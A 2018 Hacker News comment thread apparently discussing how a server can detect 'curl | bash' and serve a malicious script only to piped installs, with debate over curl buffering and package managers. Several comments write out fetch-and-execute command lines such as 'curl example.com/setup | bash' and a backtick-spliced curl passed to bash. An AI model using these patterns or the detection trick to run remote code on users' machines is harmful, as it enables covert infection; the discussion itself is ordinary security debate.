zlacker

[parent] [thread] 8 comments
1. shawn+(OP)[view] [source] 2018-07-29 06:52:15
That's mistaken because:

  bash -c "`echo echo hi`"
note that `echo echo hi` is fully read, and then (and only then) passed to bash.

ditto for

  echo -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.

It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.

replies(1): >>charle+v
2. charle+v[view] [source] 2018-07-29 07:02:06
>>shawn+(OP)
Which part is mistaken?

You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.

replies(1): >>shawn+p1
◧◩
3. shawn+p1[view] [source] [discussion] 2018-07-29 07:28:06
>>charle+v
Sorry, 2AM. You're right of course.

I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.

replies(2): >>dotanc+W7 >>adrian+Wf
◧◩◪
4. dotanc+W7[view] [source] [discussion] 2018-07-29 10:29:43
>>shawn+p1
I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.

I.e., curl is a *nix tool.

replies(1): >>laumar+zu
◧◩◪
5. adrian+Wf[view] [source] [discussion] 2018-07-29 12:52:59
>>shawn+p1
Or perhaps people shouldn't curl | bash? I don't want curl to buffer all output, I use it on devices with little RAM and do stream processing.
◧◩◪◨
6. laumar+zu[view] [source] [discussion] 2018-07-29 16:07:04
>>dotanc+W7
> Maybe a new tool that downloads and then runs a script from the interwebs needs to be written

What you're describing there is a package manager. What we don't need is a tool for running any random script from the wider internet.

replies(2): >>gkya+Mx >>allann+NB
◧◩◪◨⬒
7. gkya+Mx[view] [source] [discussion] 2018-07-29 16:41:53
>>laumar+zu
Isn't that tool what we call a "user"?
replies(1): >>jchook+Fb1
◧◩◪◨⬒
8. allann+NB[view] [source] [discussion] 2018-07-29 17:26:25
>>laumar+zu
Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap that program I just installed with pip isn't working because I'd already installed a version with apt and some of it's configuration isn't compatible!!!

It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.

[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.

◧◩◪◨⬒⬓
9. jchook+Fb1[view] [source] [discussion] 2018-07-30 01:29:22
>>gkya+Mx
Sick burn.
[go to top]